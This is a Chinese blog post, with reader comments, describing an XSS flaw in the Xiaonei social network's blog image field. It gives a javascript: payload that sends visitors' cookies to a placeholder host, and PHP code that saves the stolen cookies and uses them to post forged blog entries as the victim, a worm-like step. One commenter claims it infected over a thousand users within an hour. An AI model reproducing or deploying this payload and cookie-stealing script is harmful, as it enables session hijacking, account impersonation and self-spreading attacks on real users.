校内网一个跨站漏洞的利用

作者:Flyh4t

校内网在发blog时对插入图片过滤不严格,存在xss漏洞

在发blog时将插入图片URL写为如下代码即可触发:

javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie

test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

<?php
ob_start();
$url = 'blog.xiaonei.com';
$cookie=$_GET['cookie'];
$cookie1=$cookie."\r\n\r\n";
fputs(fopen('a.txt','a+'),$cookie1); //cookie写入 a.txt

//发一条伪造的日志,这条日志里面也可以插入恶意代码
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "title=test by fly&body=test by fly&categoryId=0&blogControl=99&passwordProtedted=0&passWord=&blog_pic_id=&pic_path=&activity=&id=&relative_optpe=";

fwrite($sock, "POST http://$url/NewEntry.do HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: http://$url\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:".$cookie."\r\n\r\n");
fwrite($sock, $data);

相关日志

楼被抢了 15 层了... 抢座Rss 2.0或者 Trackback

  • dayzero

    貌似现在出问题了

    我再添加图片代码之后 文本里面就没东西了

    无法发表文章…

  • dayzero

    可以新发表一个文章 然后修改加上代码

  • 孤鸿影

    //发一条伪造的日志,日志里面插入恶意代码
    挂了1个小时,感染了上千人

  • 校内挂了

    校内挂了

    抱歉,网站正在维护更新,请稍后再来:)

  • 不填不让说话

    校内维护鸟~~

  • faust

    校内维护了一下午,结果还是没有补上去这个洞洞

  • 天津托盘

    我很不喜欢陈一舟的东西。

  • Catty

    是机房停电了,啥挂了啊

  • 校内~~~

    别人的照片也不能看,上校内干毛!

  • 貌似还有

    貌似有个地方伴随诞生之日起就一直存在。很明显的一个地方。大家在找人的时候用得到。哈哈,自己挖吧!

    • 孤鸿影

      那个位置没有利用价值
      搞出不蠕虫
      登陆的地方也有XSS

  • 好人

    这个现在到底还能用么?

    • mere

      能啊,还有许多校内XSS没公布呢

  • HuangJ.in

    好可惜啊,这个漏洞已经被补上了~

  • 欣赏鬼仔。

    可惜了,没有及时关注鬼仔’S ORG,只有喜欢看这个网站,支持下~

发表评论